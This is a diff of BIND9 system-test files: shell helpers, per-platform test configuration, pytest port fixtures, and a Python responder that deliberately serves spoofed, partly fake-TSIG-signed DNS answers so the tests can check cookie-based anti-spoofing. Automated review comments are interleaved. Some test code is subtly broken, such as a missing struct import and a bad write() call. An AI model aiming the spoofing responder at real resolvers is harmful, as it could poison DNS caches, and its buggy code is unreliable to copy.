"$file" | grep -F -e "$msg" > /dev/null +) + +# wait_for_log: wait until message $2 in file $3 appears. Bail out after +# $1 seconds. 
This needs to be used in conjunction with a prior call to +# nextpart() or nextpartreset() on the same file to guarantee the offset is +# set correctly. Tests using wait_for_log() are responsible for cleaning up +# the created <file>.prev files. +wait_for_log() ( + timeout="$1" + msg="$2" + file="$3" + retry_quiet "$timeout" _search_log "$msg" "$file" && return 0 + echo_i "exceeded time limit waiting for '$msg' in $file" + return 1 +) + +# wait_for_log_peek: similar to wait_for_log() but peeking, so the file offset +# does not change. +wait_for_log_peek() ( + timeout="$1" + msg="$2" + file="$3" + retry_quiet "$timeout" _search_log_peek "$msg" "$file" && return 0 + echo_i "exceeded time limit waiting for '$msg' in $file" + return 1 +) + +# _retry: keep running a command until it succeeds, up to $1 times, with +# one-second intervals, optionally printing a message upon every attempt +_retry() { + __retries="${1}" + shift + + while :; do + if "$@"; then + return 0 + fi + __retries=$((__retries-1)) + if [ "${__retries}" -gt 0 ]; then + if [ "${__retry_quiet}" -ne 1 ]; then + echo_i "retrying" + fi + sleep 1 + else + return 1 + fi + done +} + +# retry: call _retry() in verbose mode +retry() { + __retry_quiet=0 + _retry "$@" +} + +# retry_quiet: call _retry() in silent mode +retry_quiet() { + __retry_quiet=1 + _retry "$@" +} + +# _repeat: keep running command up to $1 times, unless it fails +_repeat() ( + __retries="${1}" + shift + while :; do + if ! 
"$@"; then + return 1 + fi + __retries=$((__retries-1)) + if [ "${__retries}" -le 0 ]; then + break + fi + done + return 0 +) + +rndc_reload() { + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} reload $3 2>&1 | sed 's/^/'"I:$SYSTESTDIR:$1"' /' + # reloading single zone is synchronous, if we're reloading whole server + # we need to wait for reload to finish + if [ -z "$3" ]; then + for __try in 0 1 2 3 4 5 6 7 8 9; do + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} status | grep "reload/reconfig in progress" > /dev/null || break + sleep 1 + done + fi +} + +rndc_reconfig() { + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} reconfig 2>&1 | sed 's/^/'"I:$SYSTESTDIR:$1"' /' + for __try in 0 1 2 3 4 5 6 7 8 9; do + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} status | grep "reload/reconfig in progress" > /dev/null || break + sleep 1 + done +} + +# rndc_dumpdb: call "rndc dumpdb [...]" and wait until it completes +# +# The first argument is the name server instance to send the command to, in the +# form of "nsX" (where "X" is the instance number), e.g. "ns5". The remaining +# arguments, if any, are appended to the rndc command line after "dumpdb". +# +# Control channel configuration for the name server instance to send the +# command to must match the contents of bin/tests/system/common/rndc.conf. +# +# rndc output is stored in a file called rndc.out.test${n}; the "n" variable is +# required to be set by the calling tests.sh script. +# +# Return 0 if the dump completes successfully; return 1 if rndc returns an exit +# code other than 0 or if the "; Dump complete" string does not appear in the +# dump within 10 seconds. 
+rndc_dumpdb() { + __ret=0 + __dump_complete=0 + __server="${1}" + __ip="10.53.0.$(echo "${__server}" | tr -c -d "0-9")" + + shift + ${RNDC} -c ../common/rndc.conf -p "${CONTROLPORT}" -s "${__ip}" dumpdb "$@" > "rndc.out.test${n}" 2>&1 || __ret=1 + + for _ in 0 1 2 3 4 5 6 7 8 9 + do + if grep '^; Dump complete$' "${__server}/named_dump.db" > /dev/null; then + mv "${__server}/named_dump.db" "${__server}/named_dump.db.test${n}" + __dump_complete=1 + break + fi + sleep 1 + done + + if [ ${__dump_complete} -eq 0 ]; then + echo_i "timed out waiting for 'rndc dumpdb' to finish" + __ret=1 + fi + + return ${__ret} +} + +# get_dig_xfer_stats: extract transfer statistics from dig output stored +# in $1, converting them to a format used by some system tests. +get_dig_xfer_stats() { + LOGFILE="$1" + sed -n "s/^;; XFR size: .*messages \([0-9][0-9]*\).*/messages=\1/p" "${LOGFILE}" + sed -n "s/^;; XFR size: \([0-9][0-9]*\) records.*/records=\1/p" "${LOGFILE}" + sed -n "s/^;; XFR size: .*bytes \([0-9][0-9]*\).*/bytes=\1/p" "${LOGFILE}" +} + +# get_named_xfer_stats: from named log file $1, extract transfer +# statistics for the last transfer for peer $2 and zone $3 (from a log +# message which has to contain the string provided in $4), converting +# them to a format used by some system tests. 
+get_named_xfer_stats() { + LOGFILE="$1" + PEER="`echo $2 | sed 's/\./\\\\./g'`" + ZONE="`echo $3 | sed 's/\./\\\\./g'`" + MESSAGE="$4" + grep " ${PEER}#.*${MESSAGE}:" "${LOGFILE}" | \ + sed -n "s/.* '${ZONE}\/.* \([0-9][0-9]*\) messages.*/messages=\1/p" | tail -1 + grep " ${PEER}#.*${MESSAGE}:" "${LOGFILE}" | \ + sed -n "s/.* '${ZONE}\/.* \([0-9][0-9]*\) records.*/records=\1/p" | tail -1 + grep " ${PEER}#.*${MESSAGE}:" "${LOGFILE}" | \ + sed -n "s/.* '${ZONE}\/.* \([0-9][0-9]*\) bytes.*/bytes=\1/p" | tail -1 +} + +# copy_setports - Copy Configuration File and Replace Ports +# +# Convenience function to copy a configuration file, replacing the tokens +# QUERYPORT, CONTROLPORT and EXTRAPORT[1-8] with the values of the equivalent +# environment variables. (These values are set by "run.sh", which calls the +# scripts invoking this function.) +# +# Usage: +# copy_setports infile outfile +# +copy_setports() { + # The indirect method of handling the substitution of the PORT variables + # (defining "atsign" then substituting for it in the "sed" statement) is + # required to prevent the "Configure" script (in the win32utils/ directory) + # from replacing the <at>PORT<at> substitution tokens when it processes + # this file and produces conf.sh. 
+ atsign="@" + sed -e "s/${atsign}PORT${atsign}/${PORT}/g" \ + -e "s/${atsign}EXTRAPORT1${atsign}/${EXTRAPORT1}/g" \ + -e "s/${atsign}EXTRAPORT2${atsign}/${EXTRAPORT2}/g" \ + -e "s/${atsign}EXTRAPORT3${atsign}/${EXTRAPORT3}/g" \ + -e "s/${atsign}EXTRAPORT4${atsign}/${EXTRAPORT4}/g" \ + -e "s/${atsign}EXTRAPORT5${atsign}/${EXTRAPORT5}/g" \ + -e "s/${atsign}EXTRAPORT6${atsign}/${EXTRAPORT6}/g" \ + -e "s/${atsign}EXTRAPORT7${atsign}/${EXTRAPORT7}/g" \ + -e "s/${atsign}EXTRAPORT8${atsign}/${EXTRAPORT8}/g" \ + -e "s/${atsign}CONTROLPORT${atsign}/${CONTROLPORT}/g" \ + -e "s/${atsign}DEFAULT_ALGORITHM${atsign}/${DEFAULT_ALGORITHM}/g" \ + -e "s/${atsign}DEFAULT_ALGORITHM_NUMBER${atsign}/${DEFAULT_ALGORITHM_NUMBER}/g" \ + -e "s/${atsign}DEFAULT_BITS${atsign}/${DEFAULT_BITS}/g" \ + -e "s/${atsign}ALTERNATIVE_ALGORITHM${atsign}/${ALTERNATIVE_ALGORITHM}/g" \ + -e "s/${atsign}ALTERNATIVE_ALGORITHM_NUMBER${atsign}/${ALTERNATIVE_ALGORITHM_NUMBER}/g" \ + -e "s/${atsign}ALTERNATIVE_BITS${atsign}/${ALTERNATIVE_BITS}/g" \ + -e "s/${atsign}DEFAULT_HMAC${atsign}/${DEFAULT_HMAC}/g" \ + -e "s/${atsign}DISABLED_ALGORITHM${atsign}/${DISABLED_ALGORITHM}/g" \ + -e "s/${atsign}DISABLED_ALGORITHM_NUMBER${atsign}/${DISABLED_ALGORITHM_NUMBER}/g" \ + -e "s/${atsign}DISABLED_BITS${atsign}/${DISABLED_BITS}/g" \ + $1 > $2 +} diff --git a/bin/tests/system/conf.sh.in b/bin/tests/system/conf.sh.in new file mode 100644 index 0000000..d5b5996 --- /dev/null +++ b/bin/tests/system/conf.sh.in 
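Review bot: `nextpartread` in conf.sh.common builds its awk program by splicing the contents of `$1.prev` into the program text (`awk "NR > $prev "'{ print } ...`), so an empty or damaged marker file becomes an awk syntax error or extra program text, and every later `nextpart` or `wait_for_log` call on that log then fails. Passing the value as data keeps the program fixed: `awk -v prev="${prev:-0}" 'NR > prev { print } END { print NR > "/dev/stderr" }' "$1" 2>&3`. `nextpart` can presumably create such a file itself, because it moves `$1.prev.tmp` over `$1.prev` without checking that the read succeeded; `nextpartread $1 3> $1.prev.tmp && mv $1.prev.tmp $1.prev` would keep the previous marker in that case. The file arguments are unquoted throughout these helpers as well.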
@@ -0,0 +1,131 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Common configuration data for system tests, to be sourced into
+# other shell scripts.
+#
+
+# Find the top of the BIND9 tree.
+export TOP=@abs_top_builddir@
+export TOP_SRCDIR=@abs_top_srcdir@
+
+# Provide TMPDIR variable for tests that need it.
+export TMPDIR=${TMPDIR:-/tmp}
+
+# This is not the windows build.
+export CYGWIN=""
+
+export ARPANAME=$TOP/bin/tools/arpaname
+export CDS=$TOP/bin/dnssec/dnssec-cds
+export CHECKCONF=$TOP/bin/check/named-checkconf
+export CHECKDS=$TOP/bin/python/dnssec-checkds
+export CHECKZONE=$TOP/bin/check/named-checkzone
+export COVERAGE=$TOP/bin/python/dnssec-coverage
+export DDNSCONFGEN=$TOP/bin/confgen/ddns-confgen
+if [ -z "$TSAN_OPTIONS" ]; then # workaround for GL#4119
+ export DELV=$TOP/bin/delv/delv
+ export RESOLVE=$TOP/bin/tests/system/resolve
+else
+ export DELV=:
+ export RESOLVE=:
+fi
+export DIG=$TOP/bin/dig/dig
+export DNSTAPREAD=$TOP/bin/tools/dnstap-read
+export DSFROMKEY=$TOP/bin/dnssec/dnssec-dsfromkey
+export FEATURETEST=$TOP/bin/tests/system/feature-test
+export FSTRM_CAPTURE=@FSTRM_CAPTURE@
+export HOST=$TOP/bin/dig/host
+export IMPORTKEY=$TOP/bin/dnssec/dnssec-importkey
+export JOURNALPRINT=$TOP/bin/tools/named-journalprint
+export KEYFRLAB=$TOP/bin/dnssec/dnssec-keyfromlabel
+export KEYGEN=$TOP/bin/dnssec/dnssec-keygen
+export KEYMGR=$TOP/bin/python/dnssec-keymgr
+export MDIG=$TOP/bin/tools/mdig
+export NAMED=$TOP/bin/named/named
+export NSEC3HASH=$TOP/bin/tools/nsec3hash
+export NSLOOKUP=$TOP/bin/dig/nslookup
+export NSUPDATE=$TOP/bin/nsupdate/nsupdate
+export NZD2NZF=$TOP/bin/tools/named-nzd2nzf
+export PK11DEL="$TOP/bin/pkcs11/pkcs11-destroy -s ${SLOT:-0} -p ${HSMPIN:-1234} -w 0"
+export PK11GEN="$TOP/bin/pkcs11/pkcs11-keygen -q -s ${SLOT:-0} -p ${HSMPIN:-1234}"
+export PK11LIST="$TOP/bin/pkcs11/pkcs11-list -s ${SLOT:-0} -p ${HSMPIN:-1234}"
+export REVOKE=$TOP/bin/dnssec/dnssec-revoke
+export RNDC=$TOP/bin/rndc/rndc
+export RNDCCONFGEN=$TOP/bin/confgen/rndc-confgen
+export RRCHECKER=$TOP/bin/tools/named-rrchecker
+export SETTIME=$TOP/bin/dnssec/dnssec-settime
+export SIGNER=$TOP/bin/dnssec/dnssec-signzone
+export TSIGKEYGEN=$TOP/bin/confgen/tsig-keygen
+export VERIFY=$TOP/bin/dnssec/dnssec-verify
+export WIRETEST=$TOP/bin/tests/wire_test
+
+export BIGKEY=$TOP/bin/tests/system/rsabigexponent/bigkey
+export GENCHECK=$TOP/bin/tests/system/rndc/gencheck
+export KEYCREATE=$TOP/bin/tests/system/tkey/keycreate
+export KEYDELETE=$TOP/bin/tests/system/tkey/keydelete
+export MAKEJOURNAL=$TOP/bin/tests/makejournal
+export PIPEQUERIES=$TOP/bin/tests/system/pipelined/pipequeries
+
+# we don't want a KRB5_CONFIG setting breaking the tests
+export KRB5_CONFIG=/dev/null
+# use local keytab instead of default /etc/krb5.keytab
+export KRB5_KTNAME=dns.keytab
+
+# Things that are different on Windows
+export KILL=kill
+export DIFF=diff
+export DOS2UNIX=true
+# There's no trailing period on Windows
+export TP=.
+
+# Programs detected by configure
+# Variables will be empty if no program was found by configure
+export SHELL=@SHELL@
+export CURL=@CURL@
+export XMLLINT=@XMLLINT@
+export XSLTPROC=@XSLTPROC@
+export PYTEST=@PYTEST@
+
+# Windows process management leave empty
+export PSSUSPEND=
+
+#
+# Interpreters for system tests detected by configure
+#
+export PERL=@PERL@
+if ! test -x "$PERL"; then
+ echo "Perl interpreter is required for system tests."
+ exit 77
+fi
+export PYTHON=@PYTHON@
+
+#
+# Determine if we support various optional features.
+#
+export CRYPTO=@CRYPTO@
+
+
+# Load common values shared between windows and unix/linux.
+. $TOP/bin/tests/system/conf.sh.common
+
+#
+# Construct the lists of tests to run
+#
+SEQUENTIAL_UNIX="@PKCS11_TEST@"
+SEQUENTIALDIRS="$SEQUENTIAL_COMMON $SEQUENTIAL_UNIX"
+
+PARALLEL_UNIX="@CHECKDS@ @COVERAGE@ @DNSTAP@ @KEYMGR@ cookie logfileconfig"
+PARALLELDIRS="$PARALLEL_COMMON $PARALLEL_UNIX"
+
+SUBDIRS="$SEQUENTIALDIRS $PARALLELDIRS"
diff --git a/bin/tests/system/conf.sh.win32 b/bin/tests/system/conf.sh.win32
new file mode 100644
index 0000000..95f9c16
--- /dev/null
+++ b/bin/tests/system/conf.sh.win32
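Review bot: `PK11DEL`, `PK11GEN` and `PK11LIST` in conf.sh.in carry the token PIN as `-p ${HSMPIN:-1234}`, so the PIN sits in exported environment variables and on the command line of every pkcs11 tool invocation, where other local users can read it from the process list. With the built-in default that is harmless, but nothing here warns someone who sets `HSMPIN` and `SLOT` for a real token. A comment above the three exports would cover it, for example `# HSMPIN ends up in the environment and on argv; point SLOT/HSMPIN at a disposable test token only`. conf.sh.win32 repeats the same three definitions.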
@@ -0,0 +1,129 @@ +#!/bin/sh +# +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Common configuration data for system tests, to be sourced into +# other shell scripts. +# + +# Find the top of the BIND9 tree. +TOP=${SYSTEMTESTTOP:=.}/../../.. + +# Make it absolute so that it continues to work after we cd. +export TOP=`cd $TOP && pwd` +export TOP_SRCDIR="$TOP" + +# This is the windows build. This disables certain tests cases +# and changes some specific behaviors where necessary. +export CYGWIN=1 + +# Visual Studio build configurations are Release and Debug +export VSCONF=${VSCONF:-Debug} + +# Interpreters for system tests +export PERL=/usr/bin/perl +if ! test -x "$PERL"; then + echo "Perl interpreter is required for system tests." 
+ exit 77 +fi +export PYTHON=@PYTHON@ + + +export ARPANAME=$TOP/Build/$VSCONF/arpaname@EXEEXT@ +export CDS=$TOP/Build/$VSCONF/dnssec-cds@EXEEXT@ +export CHECKCONF=$TOP/Build/$VSCONF/named-checkconf@EXEEXT@ +export CHECKDS="$PYTHON `cygpath -w $TOP/bin/python/dnssec-checkds.py`" +export CHECKZONE=$TOP/Build/$VSCONF/named-checkzone@EXEEXT@ +export COVERAGE="$PYTHON `cygpath -w $TOP/bin/python/dnssec-coverage.py`" +export DDNSCONFGEN=$TOP/Build/$VSCONF/ddns-confgen@EXEEXT@ +export DELV=$TOP/Build/$VSCONF/delv@EXEEXT@ +export DIG=$TOP/Build/$VSCONF/dig@EXEEXT@ +export DNSTAPREAD=$TOP/Build/$VSCONF/dnstap-read@EXEEXT@ +export DSFROMKEY=$TOP/Build/$VSCONF/dnssec-dsfromkey@EXEEXT@ +export FEATURETEST=$TOP/Build/$VSCONF/feature-test@EXEEXT@ +export FSTRM_CAPTURE=@FSTRM_CAPTURE@ +export IMPORTKEY=$TOP/Build/$VSCONF/dnssec-importkey@EXEEXT@ +export JOURNALPRINT=$TOP/Build/$VSCONF/named-journalprint@EXEEXT@ +export KEYFRLAB=$TOP/Build/$VSCONF/dnssec-keyfromlabel@EXEEXT@ +export KEYGEN=$TOP/Build/$VSCONF/dnssec-keygen@EXEEXT@ +export KEYMGR="$PYTHON `cygpath -w $TOP/bin/python/dnssec-keymgr.py`" +export MDIG=$TOP/Build/$VSCONF/mdig@EXEEXT@ +export NAMED=$TOP/Build/$VSCONF/named@EXEEXT@ +export NSEC3HASH=$TOP/Build/$VSCONF/nsec3hash@EXEEXT@ +export NSLOOKUP=$TOP/Build/$VSCONF/nslookup@EXEEXT@ +export NSUPDATE=$TOP/Build/$VSCONF/nsupdate@EXEEXT@ +export NZD2NZF=$TOP/Build/$VSCONF/named-nzd2nzf@EXEEXT@ +export PK11DEL="$TOP/Build/$VSCONF/pkcs11-destroy@EXEEXT@ -s ${SLOT:-0} -p ${HSMPIN:-1234} -w 0" +export PK11GEN="$TOP/Build/$VSCONF/pkcs11-keygen@EXEEXT@ -q -s ${SLOT:-0} -p ${HSMPIN:-1234}" +export PK11LIST="$TOP/Build/$VSCONF/pkcs11-list@EXEEXT@ -s ${SLOT:-0} -p ${HSMPIN:-1234}" +export REVOKE=$TOP/Build/$VSCONF/dnssec-revoke@EXEEXT@ +export RNDC=$TOP/Build/$VSCONF/rndc@EXEEXT@ +export RNDCCONFGEN=$TOP/Build/$VSCONF/rndc-confgen@EXEEXT@ +export RRCHECKER=$TOP/Build/$VSCONF/named-rrchecker@EXEEXT@ +export SETTIME=$TOP/Build/$VSCONF/dnssec-settime@EXEEXT@ +export 
SIGNER=$TOP/Build/$VSCONF/dnssec-signzone@EXEEXT@ +export TSIGKEYGEN=$TOP/Build/$VSCONF/tsig-keygen@EXEEXT@ +export VERIFY=$TOP/Build/$VSCONF/dnssec-verify@EXEEXT@ + +# to port WIRETEST=$TOP/Build/$VSCONF/wire_test@EXEEXT@ +export WIRETEST= + +export BIGKEY=$TOP/Build/$VSCONF/bigkey@EXEEXT@ +export GENCHECK=$TOP/Build/$VSCONF/gencheck@EXEEXT@ +export KEYCREATE=$TOP/Build/$VSCONF/keycreate@EXEEXT@ +export KEYDELETE=$TOP/Build/$VSCONF/keydelete@EXEEXT@ +export MAKEJOURNAL=$TOP/Build/$VSCONF/makejournal@EXEEXT@ +export PIPEQUERIES=$TOP/Build/$VSCONF/pipequeries@EXEEXT@ +export RESOLVE=$TOP/Build/$VSCONF/resolve@EXEEXT@ + +# we don't want a KRB5_CONFIG setting breaking the tests +export KRB5_CONFIG=NUL + +# Things that are different on Windows +export KILL="/bin/kill -f" +export DIFF="diff --strip-trailing-cr" +export DOS2UNIX=dos2unix +# No trailing period +export TP= + +# Configure is launched from native environment, but tests are run in Cygwin - +# so any detection is unreliable. +export SHELL="/bin/bash -o igncr" +export CURL=/usr/bin/curl +export XMLLINT=/usr/bin/xmllint + +# +# PsSuspend is part of PSTools and can be downloaded from +# https://download.sysinternals.com/files/PSTools.zip +# +export PSSUSPEND=@PSSUSPEND@ + +# +# Determine if we support various optional features. +# +export CRYPTO=@CRYPTO@ + + +# The rest is shared between Windows and Unices +. $TOP/bin/tests/system/conf.sh.common + +# +# Construct the lists of tests to run +# +SEQUENTIAL_WINDOWS="" +SEQUENTIALDIRS="$SEQUENTIAL_COMMON $SEQUENTIAL_WINDOWS" + +PARALLEL_WINDOWS="@CHECKDS@ @COVERAGE@ @DNSTAP@ @KEYMGR@" +PARALLELDIRS="$PARALLEL_COMMON $PARALLEL_WINDOWS" + +SUBDIRS="$SEQUENTIALDIRS $PARALLELDIRS" diff --git a/bin/tests/system/conftest.py b/bin/tests/system/conftest.py new file mode 100644 index 0000000..8abf963 --- /dev/null +++ b/bin/tests/system/conftest.py 
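Review bot: conf.sh.win32 makes `TOP` absolute with an unquoted, backquoted `cd $TOP && pwd`, so a checkout under a directory whose name contains a space fails at the `cd`; the export itself still succeeds, leaving `TOP` empty. The later `. $TOP/bin/tests/system/conf.sh.common` would then resolve from the filesystem root rather than from the build tree. Quoting and checking the result closes that: `TOP=$(cd "$TOP" && pwd) || exit 1` followed by `export TOP`. The `cygpath -w $TOP/bin/python/...` substitutions are unquoted in the same way, and the tool variables are presumably expanded unquoted by the test scripts too, so this alone would not make such paths fully usable.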
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+import os
+
+import pytest
+
+
+@pytest.fixture(scope="session")
+def named_port():
+ return int(os.environ.get("PORT", default=5300))
+
+
+@pytest.fixture(scope="session")
+def named_tlsport():
+ return int(os.environ.get("TLSPORT", default=8853))
+
+
+@pytest.fixture(scope="session")
+def control_port():
+ return int(os.environ.get("CONTROLPORT", default=9953))
diff --git a/bin/tests/system/cookie/ans9/ans.py b/bin/tests/system/cookie/ans9/ans.py
new file mode 100644
index 0000000..1266b7e
--- /dev/null
+++ b/bin/tests/system/cookie/ans9/ans.py
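Review bot: Each fixture in conftest.py calls `int()` directly on the environment value, so a variable that is exported but empty (`PORT=`) raises `ValueError` during fixture setup instead of falling back, because `os.environ.get` only uses `default` when the variable is absent. `return int(os.environ.get("PORT") or 5300)` handles both cases, and the same form applies to `TLSPORT` and `CONTROLPORT`. The three fixtures also have no docstrings; one line each naming the environment variable read and its default would document the contract for test authors.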
@@ -0,0 +1,300 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns +import dns.edns +import dns.flags +import dns.message +import dns.query +import dns.tsig +import dns.tsigkeyring +import dns.version + +from dns.edns import * +from dns.name import * +from dns.rcode import * +from dns.rdataclass import * +from dns.rdatatype import * +from dns.tsig import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +# DNS 2.0 keyring specifies the algorithm +try: + keyring = dns.tsigkeyring.from_text( + { + "foo": {"hmac-sha256", "aaaaaaaaaaaa"}, + "fake": {"hmac-sha256", "aaaaaaaaaaaa"}, + } + ) +except: + keyring = dns.tsigkeyring.from_text({"foo": "aaaaaaaaaaaa", "fake": "aaaaaaaaaaaa"}) + +dopass2 = False + + +############################################################################ +# +# This server will serve valid and spoofed answers. A spoofed answer will +# have the address 10.53.0.10 included. +# +# When receiving a query over UDP: +# +# A query to "nocookie"/A will result in a spoofed answer with no cookie set. +# A query to "tcponly"/A will result in a spoofed answer with no cookie set. +# A query to "withtsig"/A will result in two responses, the first is a spoofed +# answer that is TSIG signed, the second is a valid answer with a cookie set. +# A query to anything else will result in a valid answer with a cookie set. 
+# +# When receiving a query over TCP: +# +# A query to "nocookie"/A will result in a valid answer with no cookie set. +# A query to anything else will result in a valid answer with a cookie set. +# +############################################################################ +def create_response(msg, tcp, first, ns10): + global dopass2 + m = dns.message.from_wire(msg, keyring=keyring) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, qname)) + print("%s %s" % (typename, qname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + if rrtype == A: + # exempt potential nameserver A records. + if labels[0] == "ns" and ns10: + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + else: + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.9")) + if not tcp and labels[0] == "nocookie": + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + if not tcp and labels[0] == "tcponly": + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + if first and not tcp and labels[0] == "withtsig": + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + dopass2 = True + elif rrtype == NS: + r.answer.append(dns.rrset.from_text(qname, 1, IN, NS, ".")) + elif rrtype == SOA: + r.answer.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0")) + else: + r.authority.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 
0 0 0 0 0")) + # Add a server cookie to the response + if labels[0] != "nocookie": + for o in m.options: + if o.otype == 10: # Use 10 instead of COOKIE + if first and labels[0] == "withtsig" and not tcp: + r.use_tsig( + keyring=keyring, + keyname=dns.name.from_text("fake"), + algorithm=HMAC_SHA256, + ) + elif labels[0] != "tcponly" or tcp: + cookie = o + if len(o.data) == 8: + cookie.data = o.data + o.data + else: + cookie.data = o.data + r.use_edns(options=[cookie]) + r.flags |= dns.flags.AA + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4_addr1 = "10.53.0.9" +ip4_addr2 = "10.53.0.10" +ip6_addr1 = "fd92:7065:b8e:ffff::9" +ip6_addr2 = "fd92:7065:b8e:ffff::10" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_udp1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_udp1.bind((ip4_addr1, port)) +query4_tcp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +query4_tcp1.bind((ip4_addr1, port)) +query4_tcp1.listen(1) +query4_tcp1.settimeout(1) + +query4_udp2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_udp2.bind((ip4_addr2, port)) +query4_tcp2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +query4_tcp2.bind((ip4_addr2, port)) +query4_tcp2.listen(1) +query4_tcp2.settimeout(1) + +havev6 = True +query6_udp1 = None +query6_udp2 = None +query6_tcp1 = None +query6_tcp2 = None +try: + query6_udp1 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + query6_udp1.bind((ip6_addr1, port)) + query6_tcp1 = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + query6_tcp1.bind((ip6_addr1, 
port)) + query6_tcp1.listen(1) + query6_tcp1.settimeout(1) + + query6_udp2 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + query6_udp2.bind((ip6_addr2, port)) + query6_tcp2 = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + query6_tcp2.bind((ip6_addr2, port)) + query6_tcp2.listen(1) + query6_tcp2.settimeout(1) +except: + if query6_udp1 != None: + query6_udp1.close() + if query6_tcp1 != None: + query6_tcp1.close() + if query6_udp2 != None: + query6_udp2.close() + if query6_tcp2 != None: + query6_tcp2.close() + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Using DNS version %s" % dns.version.version) +print("Listening on %s port %d" % (ip4_addr1, port)) +print("Listening on %s port %d" % (ip4_addr2, port)) +if havev6: + print("Listening on %s port %d" % (ip6_addr1, port)) + print("Listening on %s port %d" % (ip6_addr2, port)) +print("Ctrl-c to quit") + +if havev6: + input = [ + query4_udp1, + query6_udp1, + query4_tcp1, + query6_tcp1, + query4_udp2, + query6_udp2, + query4_tcp2, + query6_tcp2, + ] +else: + input = [query4_udp1, query4_tcp1, query4_udp2, query4_tcp2] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + ns10 = False + if s == query4_udp1 or s == query6_udp1 or s == query4_udp2 or s == query6_udp2: + if s == query4_udp1 or s == query6_udp1: + print( + "UDP Query received on %s" + % (ip4_addr1 if s == query4_udp1 else ip6_addr1), + end=" ", + ) + if s == query4_udp2 or s == query6_udp2: + print( + "UDP Query received on %s" + % (ip4_addr2 if s == query4_udp2 else ip6_addr2), + end=" ", + ) + ns10 = True + # Handle incoming queries + msg = s.recvfrom(65535) + dopass2 = False + rsp = create_response(msg[0], False, True, ns10) + 
print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + if dopass2: + print("Sending second UDP response without TSIG", end=" ") + rsp = create_response(msg[0], False, False, ns10) + s.sendto(rsp.to_wire(), msg[1]) + print(dns.rcode.to_text(rsp.rcode())) + + if s == query4_tcp1 or s == query6_tcp1 or s == query4_tcp2 or s == query6_tcp2: + try: + (cs, _) = s.accept() + if s == query4_tcp1 or s == query6_tcp1: + print( + "TCP Query received on %s" + % (ip4_addr1 if s == query4_tcp1 else ip6_addr1), + end=" ", + ) + if s == query4_tcp2 or s == query6_tcp2: + print( + "TCP Query received on %s" + % (ip4_addr2 if s == query4_tcp2 else ip6_addr2), + end=" ", + ) + ns10 = True + # get TCP message length + buf = cs.recv(2) + length = struct.unpack(">H", buf[:2])[0] + # grep DNS message + msg = cs.recv(length) + rsp = create_response(msg, True, True, ns10) + print(dns.rcode.to_text(rsp.rcode())) + wire = rsp.to_wire() + cs.send(struct.pack(">H", len(wire))) + cs.send(wire) + cs.close() + except s.timeout: + pass + if not running: + break diff --git a/bin/tests/system/cookie/bad-cookie-badaes.conf b/bin/tests/system/cookie/bad-cookie-badaes.conf new file mode 100644 index 